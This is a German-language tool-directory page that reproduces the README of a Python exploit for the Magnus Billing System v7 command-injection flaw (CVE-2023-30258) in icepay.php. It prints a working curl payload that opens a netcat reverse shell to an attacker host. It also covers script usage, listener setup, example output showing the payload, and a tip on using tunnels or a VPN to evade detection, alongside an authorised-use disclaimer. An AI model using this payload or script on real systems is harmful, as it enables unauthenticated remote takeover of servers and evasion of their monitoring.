Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit | Kitploit
Tools/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
71vor 1 JahrNoch nicht geprüft

Exploit für Magnus Billing System v7

Dieses Python-Skript automatisiert die Ausnutzung einer Befehlsinjektions-Schwachstelle in Magnus Billing System v7, insbesondere im icepay.php-Skript unter /mbilling/lib/icepay/icepay.php. Der Exploit nutzt den Parameter democ aus, um beliebige Befehle auf dem Zielsystem auszuführen und letztendlich eine Reverse-Shell zu einer vom Angreifer kontrollierten Maschine herzustellen.

Schwachstellenübersicht

Die Schwachstelle ermöglicht eine nicht authentifizierte Befehlsinjektion über eine präparierte GET-Anfrage. Das ursprüngliche Proof-of-Concept (PoC) verwendete den folgenden curl-Befehl:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

Dieses Skript automatisiert diesen Prozess und macht ihn über Befehlszeilenargumente konfigurierbar.

Funktionen

  • Konfigurierbar: Ziel-IP, Angreifer-IP und Port über Befehlszeilenargumente angeben
  • Einfach: Verwendet die Bibliothek requests, um die HTTP-Anfrage mit der Payload zu senden
  • Feedback: Liefert klare Ausgaben, um den Fortschritt des Exploits zu verfolgen

Voraussetzungen

  • Python 3.x: Stellen Sie sicher, dass Python 3 auf Ihrem System installiert ist
  • Requests-Bibliothek: Installieren Sie das Python-Modul requests:
    root@kitploit:~
    pip install requests
    
  • Netcat: Das Zielsystem muss netcat (nc) installiert haben, damit die Reverse-Shell funktioniert
  • Listener: Richten Sie auf der Angreifer-Maschine einen netcat-Listener ein, um die Reverse-Shell zu empfangen
  • Verwundbares Ziel: Das Ziel muss Magnus Billing System v7 ausführen, wobei das verwundbare icepay.php-Skript erreichbar sein muss

Verwendung

Einrichtung

  1. Klonen oder Herunterladen: Speichern Sie das Skript als exploit.py
  2. Listener einrichten: Starten Sie auf Ihrer Angreifer-Maschine einen netcat-Listener:
    root@kitploit:~
    nc -lvnp <PORT>
    
    Ersetzen Sie <PORT> durch Ihren gewählten Port (z. B. 443)

Ausführen des Exploits

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

Parameter:

  • -t, --target: IP-Adresse des Zielsystems (Magnus Billing System)
  • -a, --attacker: Ihre IP-Adresse zum Empfangen der Reverse-Shell
  • -p, --port: Port auf Ihrer Maschine für die Reverse-Shell

Beispiel

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

Erwartete Ausgabe:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. Shell empfangen: Wechseln Sie zu Ihrem netcat-Listener, um bei Erfolg mit der Reverse-Shell zu interagieren

Technische Hinweise

  • Payload-Typ: Das Skript verwendet eine FIFO-basierte Reverse-Shell (mkfifo) mit netcat
  • Fehlerbehandlung: Grundlegende Prüfungen auf Netzwerkfehler und ungültige Ports sind enthalten
  • Debugging: Um die Antwort des Servers zu überprüfen, kommentieren Sie print(response.text) in der Funktion exploit() aus
  • Alternative Payloads: Das Skript kann bei Bedarf angepasst werden, um andere Reverse-Shell-Payloads zu verwenden

Fehlerbehebung

  • Wenn die Verbindung fehlschlägt, überprüfen Sie Folgendes:
    • Das Zielsystem hat netcat installiert
    • Keine Firewall blockiert die Verbindung
    • Die richtigen Ports verwendet werden
    • Das Ziel nicht gepatcht wurde

Sicherheitshinweise

  • Erwägen Sie, bei der Verwendung dieses Exploits SSH-Tunneling oder ein VPN zu nutzen, um eine Erkennung zu vermeiden
  • Die Payload könnte Sicherheitsüberwachungssysteme auslösen

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken. Verwenden Sie es nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Zustimmung zum Testen haben, ist illegal und unethisch. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.

Lizenz

Dieses Projekt wird unter der MIT-Lizenz veröffentlicht. Sie können es nach Bedarf modifizieren und weiterverteilen, sofern der Haftungsausschluss erhalten bleibt.

Mitwirken

Beiträge, Fehlerberichte und Feature-Anfragen sind willkommen. Reichen Sie gerne einen Pull-Request ein oder eröffnen Sie ein Issue.

Tool herunterladen